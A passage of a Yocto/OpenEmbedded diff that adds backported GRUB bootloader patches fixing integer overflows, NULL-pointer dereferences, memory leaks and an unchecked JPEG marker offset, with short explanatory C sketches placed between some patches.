+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -161,7 +168,9 @@ grub_video_fbfill_direct8 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
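grub_mul() and grub_sub() here come from GRUB's safemath helpers, which report overflow to the caller instead of letting the arithmetic wrap silently; an equivalent can be sketched on top of the GCC/Clang checked-arithmetic builtins. The macro names below are mine, not GRUB's exact definitions, and the 32-bit result type mirrors grub_size_t on a 32-bit target:

    #include <stdio.h>

    /* Checked helpers in the spirit of grub_mul()/grub_sub(): they evaluate to
       a nonzero value on overflow and store the result otherwise.  */
    #define checked_mul(a, b, out) __builtin_mul_overflow ((a), (b), (out))
    #define checked_sub(a, b, out) __builtin_sub_overflow ((a), (b), (out))

    int
    main (void)
    {
      unsigned int bytes_per_pixel = 4;
      unsigned int width = 0x40000000u;   /* hostile width from a mode structure */
      unsigned int pitch = 8192;
      unsigned int rowskip;

      if (checked_mul (bytes_per_pixel, width, &rowskip)
          || checked_sub (pitch, rowskip, &rowskip))
        {
          /* The patched fillers simply return at this point.  */
          puts ("overflow detected, refusing to fill");
          return 1;
        }

      printf ("rowskip = %u\n", rowskip);
      return 0;
    }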
diff --git a/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
new file mode 100644
index 0000000000..544e7f31ae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
@@ -0,0 +1,104 @@
+From 69b91f7466a5ad5fb85039a5b4118efb77ad6347 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 14:43:44 +0000
+Subject: [PATCH] video/fb/video_fb: Fix multiple integer overflows
+
+The calculation of the unsigned 64-bit value is being generated by
+multiplying 2, signed or unsigned, 32-bit integers which may overflow
+before promotion to unsigned 64-bit. Fix all of them.
+
+Fixes: CID 73703, CID 73767, CID 73833
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08e098b1dbf01e96376f594b337491bc4cfa48dd]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 52 ++++++++++++++++++++++++-----------
+ 1 file changed, 36 insertions(+), 16 deletions(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1a602c8..1c9a138 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -25,6 +25,7 @@
+ #include <grub/fbutil.h>
+ #include <grub/bitmap.h>
+ #include <grub/dl.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -1417,15 +1418,23 @@ doublebuf_blit_update_screen (void)
+ {
+ if (framebuffer.current_dirty.first_line
+ <= framebuffer.current_dirty.last_line)
+- grub_memcpy ((char *) framebuffer.pages[0]
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (framebuffer.current_dirty.last_line
+- - framebuffer.current_dirty.first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (framebuffer.current_dirty.last_line,
++ framebuffer.current_dirty.first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[0] + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
+ framebuffer.current_dirty.last_line = 0;
+@@ -1439,7 +1448,7 @@ grub_video_fb_doublebuf_blit_init (struct grub_video_fbrender_target **back,
+ volatile void *framebuf)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info.pitch * mode_info.height;
++ grub_size_t page_size = (grub_size_t) mode_info.pitch * mode_info.height;
+
+ framebuffer.offscreen_buffer = grub_zalloc (page_size);
+ if (! framebuffer.offscreen_buffer)
+@@ -1482,12 +1491,23 @@ doublebuf_pageflipping_update_screen (void)
+ last_line = framebuffer.previous_dirty.last_line;
+
+ if (first_line <= last_line)
+- grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page]
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (last_line - first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (last_line, first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page] + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
++
+ framebuffer.previous_dirty = framebuffer.current_dirty;
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
diff --git a/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
new file mode 100644
index 0000000000..c82b2c7df0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
@@ -0,0 +1,39 @@
+From aac5574ff340a665ccc78d4c3d61596ac67acbbe Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 14:51:30 +0000
+Subject: [PATCH] video/fb/video_fb: Fix possible integer overflow
+
+There is minimal possibility that the values being used here will overflow.
+So, change the code to use the safemath function grub_mul() to ensure
+that doesn't happen.
+
+Fixes: CID 73761
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08413f2f4edec0e2d9bf15f836f6ee5ca2e379cb]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1c9a138..ae6b89f 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -1537,7 +1537,13 @@ doublebuf_pageflipping_init (struct grub_video_mode_info *mode_info,
+ volatile void *page1_ptr)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info->pitch * mode_info->height;
++ grub_size_t page_size = 0;
++
++ if (grub_mul (mode_info->pitch, mode_info->height, &page_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
+
+ framebuffer.offscreen_buffer = grub_malloc (page_size);
+ if (! framebuffer.offscreen_buffer)
diff --git a/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
new file mode 100644
index 0000000000..3fca2aecb5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
@@ -0,0 +1,38 @@
+From 88361a7fd4e481a76e1159a63c9014fa997ef29c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:39:00 +0000
+Subject: [PATCH] video/readers/jpeg: Test for an invalid next marker reference
+ from a jpeg file
+
+While it may never happen, and potentially could be caught at the end of
+the function, it is worth checking up front for a bad reference to the
+next marker just in case of a maliciously crafted file being provided.
+
+Fixes: CID 73694
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5f5eb7ca8e971227e95745abe541df3e1509360e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/readers/jpeg.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..0b6ce3c 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -253,6 +253,12 @@ grub_jpeg_decode_quan_table (struct grub_jpeg_data *data)
+ next_marker = data->file->offset;
+ next_marker += grub_jpeg_get_word (data);
+
++ if (next_marker > data->file->size)
++ {
++ /* Should never be set beyond the size of the file. */
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "jpeg: invalid next reference");
++ }
++
+ while (data->file->offset + sizeof (data->quan_table[id]) + 1
+ <= next_marker)
+ {
diff --git a/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
new file mode 100644
index 0000000000..61e5e5797d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
@@ -0,0 +1,34 @@
+From 9433cb3a37c03f22c2fa769121f1f509fd031ae9 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Mon, 7 Dec 2020 14:44:47 +0000
+Subject: [PATCH] gfxmenu/gui_list: Remove code that coverity is flagging as
+ dead
+
+The test of value for NULL before calling grub_strdup() is not required,
+since the if condition prior to this has already tested for value being
+NULL and execution cannot reach this code if it is.
+
+Fixes: CID 73659
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4a1aa5917595650efbd46b581368c470ebee42ab]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gfxmenu/gui_list.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/gfxmenu/gui_list.c b/grub-core/gfxmenu/gui_list.c
+index 01477cd..df334a6 100644
+--- a/grub-core/gfxmenu/gui_list.c
++++ b/grub-core/gfxmenu/gui_list.c
+@@ -771,7 +771,7 @@ list_set_property (void *vself, const char *name, const char *value)
+ {
+ self->need_to_recreate_boxes = 1;
+ grub_free (self->selected_item_box_pattern);
+- self->selected_item_box_pattern = value ? grub_strdup (value) : 0;
++ self->selected_item_box_pattern = grub_strdup (value);
+ self->selected_item_box_pattern_inherit = 0;
+ }
+ }
diff --git a/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
new file mode 100644
index 0000000000..34643e10ab
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
@@ -0,0 +1,47 @@
+From 7899384c8fdf9ed96566978c49b0c6e40e70703d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:47:13 +0000
+Subject: [PATCH] loader/bsd: Check for NULL arg up-front
+
+The code in the next block suggests that it is possible for .set to be
+true but .arg may still be NULL.
+
+This code assumes that it is never NULL, yet later tests whether it is
+NULL - that is inconsistent.
+
+So we should check first if .arg is not NULL, and remove this check that
+is being flagged by Coverity since it is no longer required.
+
+Fixes: CID 292471
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5d5391b0a05abe76e04c1eb68dcc6cbef5326c4a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/i386/bsd.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/loader/i386/bsd.c b/grub-core/loader/i386/bsd.c
+index b92cbe9..8432283 100644
+--- a/grub-core/loader/i386/bsd.c
++++ b/grub-core/loader/i386/bsd.c
+@@ -1605,7 +1605,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ kernel_type = KERNEL_TYPE_OPENBSD;
+ bootflags = grub_bsd_parse_flags (ctxt->state, openbsd_flags);
+
+- if (ctxt->state[OPENBSD_ROOT_ARG].set)
++ if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg != NULL)
+ {
+ const char *arg = ctxt->state[OPENBSD_ROOT_ARG].arg;
+ unsigned type, unit, part;
+@@ -1622,7 +1622,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ "unknown disk type name");
+
+ unit = grub_strtoul (arg, (char **) &arg, 10);
+- if (! (arg && *arg >= 'a' && *arg <= 'z'))
++ if (! (*arg >= 'a' && *arg <= 'z'))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT,
+ "only device specifications of form "
+ "<type><number><lowercase letter> are supported");
diff --git a/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
new file mode 100644
index 0000000000..41f09a22fc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
@@ -0,0 +1,38 @@
+From 0a4aa7c16f65cdfaa1013f0796afa929f8d6dc1a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:53:10 +0000
+Subject: [PATCH] loader/xnu: Fix memory leak
+
+The code here is finished with the memory stored in name, but it only
+frees it if the curvalue is valid, while it could actually free it
+regardless.
+
+The fix is a simple relocation of the grub_free() to before the test
+of curvalue.
+
+Fixes: CID 96646
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bcb59ece3263d118510c4440c4da0950f224bb7f]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 07232d2..b3029a8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1388,9 +1388,9 @@ grub_xnu_fill_devicetree (void)
+ name[len] = 0;
+
+ curvalue = grub_xnu_create_value (curkey, name);
++ grub_free (name);
+ if (!curvalue)
+ return grub_errno;
+- grub_free (name);
+
+ data = grub_malloc (grub_strlen (var->value) + 1);
+ if (!data)
diff --git a/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
new file mode 100644
index 0000000000..f9ad0fc34c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
@@ -0,0 +1,77 @@
+From 81117a77a9e945ee5e7c1f12bd5667e2a16cbe32 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 30 Nov 2020 12:18:24 -0300
+Subject: [PATCH] loader/xnu: Free driverkey data when an error is detected in
+ grub_xnu_writetree_toheap()
+
+... to avoid memory leaks.
+
+Fixes: CID 96640
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4b4027b6b1c877d7ab467896b04c7bd1aadcfa15]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 24 ++++++++++++++++++++----
+ 1 file changed, 20 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index b3029a8..39ceff8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -224,26 +224,33 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ if (! memorymap)
+ return grub_errno;
+
+- driverkey = (struct grub_xnu_devtree_key *) grub_malloc (sizeof (*driverkey));
++ driverkey = (struct grub_xnu_devtree_key *) grub_zalloc (sizeof (*driverkey));
+ if (! driverkey)
+ return grub_errno;
+ driverkey->name = grub_strdup ("DeviceTree");
+ if (! driverkey->name)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
++
+ driverkey->datasize = sizeof (*extdesc);
+ driverkey->next = memorymap->first_child;
+ memorymap->first_child = driverkey;
+ driverkey->data = extdesc
+ = (struct grub_xnu_extdesc *) grub_malloc (sizeof (*extdesc));
+ if (! driverkey->data)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
+
+ /* Allocate the space based on the size with dummy value. */
+ *size = grub_xnu_writetree_get_size (grub_xnu_devtree_root, "/");
+ err = grub_xnu_heap_malloc (ALIGN_UP (*size + 1, GRUB_XNU_PAGESIZE),
+ &src, target);
+ if (err)
+- return err;
++ goto fail;
+
+ /* Put real data in the dummy. */
+ extdesc->addr = *target;
+@@ -252,6 +259,15 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ /* Write the tree to heap. */
+ grub_xnu_writetree_toheap_real (src, grub_xnu_devtree_root, "/");
+ return GRUB_ERR_NONE;
++
++ fail:
++ memorymap->first_child = NULL;
++
++ grub_free (driverkey->data);
++ grub_free (driverkey->name);
++ grub_free (driverkey);
++
++ return err;
+ }
+
+ /* Find a key or value in parent key. */
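The fix above funnels every error path through a single cleanup label so that
partially built allocations are always released; switching driverkey to
grub_zalloc() keeps that cleanup safe for members that were never assigned. A
minimal sketch of the same structure, with invented names rather than grub's
xnu device-tree types:

    #include <stdlib.h>
    #include <string.h>

    /* Error-path cleanup through a single label; names here are made up. */
    struct node { char *name; void *data; };

    static int build_node (struct node **out)
    {
      struct node *n = calloc (1, sizeof (*n));

      if (n == NULL)
        return -1;

      n->name = strdup ("DeviceTree");
      if (n->name == NULL)
        goto fail;

      n->data = malloc (16);
      if (n->data == NULL)
        goto fail;

      *out = n;
      return 0;

     fail:
      /* calloc() zeroed the struct, so free() on untouched members is safe. */
      free (n->data);
      free (n->name);
      free (n);
      return -1;
    }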
diff --git a/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
new file mode 100644
index 0000000000..8081f7763a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
@@ -0,0 +1,42 @@
+From 778a3fffd19229e5650a1abfb06c974949991cd4 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 30 Nov 2020 10:36:00 -0300
+Subject: [PATCH] loader/xnu: Check if pointer is NULL before using it
+
+Fixes: CID 73654
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7c8a2b5d1421a0f2a33d33531f7561f3da93b844]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 39ceff8..adc048c 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -667,6 +667,9 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ char *name, *nameend;
+ int namelen;
+
++ if (infoplistname == NULL)
++ return grub_error (GRUB_ERR_BAD_FILENAME, N_("missing p-list filename"));
++
+ name = get_name_ptr (infoplistname);
+ nameend = grub_strchr (name, '/');
+
+@@ -698,10 +701,7 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ else
+ macho = 0;
+
+- if (infoplistname)
+- infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+- else
+- infoplist = 0;
++ infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+ grub_errno = GRUB_ERR_NONE;
+ if (infoplist)
+ {
diff --git a/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
new file mode 100644
index 0000000000..ea563a41a0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
@@ -0,0 +1,41 @@
+From 5d2dd0052474a882a22e47cc8c3ed87a01819f6b Mon Sep 17 00:00:00 2001
+From: Daniel Kiper <daniel.kiper@oracle.com>
+Date: Thu, 25 Feb 2021 18:35:01 +0100
+Subject: [PATCH] util/grub-install: Fix NULL pointer dereferences
+
+Two grub_device_open() calls do not have associated NULL checks
+for returned values. Fix that and appease Coverity.
+
+Fixes: CID 314583
+
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b3a95655b4391122e7b0315d8cc6f876caf8183]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-install.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/util/grub-install.c b/util/grub-install.c
+index a82725f..367350f 100644
+--- a/util/grub-install.c
++++ b/util/grub-install.c
+@@ -1775,6 +1775,8 @@ main (int argc, char *argv[])
+ fill_core_services (core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, core_services, 0);
+
+@@ -1875,6 +1877,8 @@ main (int argc, char *argv[])
+ fill_core_services(core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, boot_efi, 1);
+ if (!removable && update_nvram)
diff --git a/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
new file mode 100644
index 0000000000..0cd8ec3611
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
@@ -0,0 +1,46 @@
+From 3d68daf2567aace4b52bd238cfd4a8111af3bc04 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 14:33:50 +0000
+Subject: [PATCH] util/grub-editenv: Fix incorrect casting of a signed value
+
+The return value of ftell() may be negative (-1) on error. While it is
+probably unlikely to occur, we should not blindly cast to an unsigned
+value without first testing that it is not negative.
+
+Fixes: CID 73856
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5dc41edc4eba259c6043ae7698c245ec1baaacc6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-editenv.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-editenv.c b/util/grub-editenv.c
+index f3662c9..db6f187 100644
+--- a/util/grub-editenv.c
++++ b/util/grub-editenv.c
+@@ -125,6 +125,7 @@ open_envblk_file (const char *name)
+ {
+ FILE *fp;
+ char *buf;
++ long loc;
+ size_t size;
+ grub_envblk_t envblk;
+
+@@ -143,7 +144,12 @@ open_envblk_file (const char *name)
+ grub_util_error (_("cannot seek `%s': %s"), name,
+ strerror (errno));
+
+- size = (size_t) ftell (fp);
++ loc = ftell (fp);
++ if (loc < 0)
++ grub_util_error (_("cannot get file location `%s': %s"), name,
++ strerror (errno));
++
++ size = (size_t) loc;
+
+ if (fseek (fp, 0, SEEK_SET) < 0)
+ grub_util_error (_("cannot seek `%s': %s"), name,
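Both this patch and the glue-efi one that follows apply the same rule: keep the
ftell() result in a signed long, reject a negative value, and only then cast it
to an unsigned size. A small illustrative helper showing that pattern outside
grub (error reporting is simplified; grub_util_error() is not used here):

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Return a file's size, refusing to cast a negative ftell() result. */
    static size_t file_size_or_die (FILE *fp, const char *name)
    {
      long loc;

      if (fseek (fp, 0, SEEK_END) < 0)
        {
          fprintf (stderr, "cannot seek `%s': %s\n", name, strerror (errno));
          exit (1);
        }

      loc = ftell (fp);
      if (loc < 0)
        {
          fprintf (stderr, "cannot get file location `%s': %s\n",
                   name, strerror (errno));
          exit (1);
        }

      if (fseek (fp, 0, SEEK_SET) < 0)
        {
          fprintf (stderr, "cannot seek `%s': %s\n", name, strerror (errno));
          exit (1);
        }

      return (size_t) loc;
    }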
diff --git a/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
new file mode 100644
index 0000000000..66d7c0aa42
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
@@ -0,0 +1,50 @@
+From e301a0f38a2130eb80f346c31e43bf5089af583c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:04:28 +0000
+Subject: [PATCH] util/glue-efi: Fix incorrect use of a possibly negative value
+
+It is possible for the ftell() function to return a negative value.
+Although it is fairly unlikely here, we should check for a negative
+value before we assign it to an unsigned value.
+
+Fixes: CID 73744
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=1641d74e16f9d1ca35ba1a87ee4a0bf3afa48e72]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/glue-efi.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/util/glue-efi.c b/util/glue-efi.c
+index 68f5316..de0fa6d 100644
+--- a/util/glue-efi.c
++++ b/util/glue-efi.c
+@@ -39,13 +39,23 @@ write_fat (FILE *in32, FILE *in64, FILE *out, const char *out_filename,
+ struct grub_macho_fat_header head;
+ struct grub_macho_fat_arch arch32, arch64;
+ grub_uint32_t size32, size64;
++ long size;
+ char *buf;
+
+ fseek (in32, 0, SEEK_END);
+- size32 = ftell (in32);
++ size = ftell (in32);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name32, strerror (errno));
++ size32 = (grub_uint32_t) size;
+ fseek (in32, 0, SEEK_SET);
++
+ fseek (in64, 0, SEEK_END);
+- size64 = ftell (in64);
++ size = ftell (in64);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name64, strerror (errno));
++ size64 = (grub_uint64_t) size;
+ fseek (in64, 0, SEEK_SET);
+
+ head.magic = grub_cpu_to_le32_compile_time (GRUB_MACHO_FAT_EFI_MAGIC);
diff --git a/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
new file mode 100644
index 0000000000..b279222fff
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
@@ -0,0 +1,28 @@
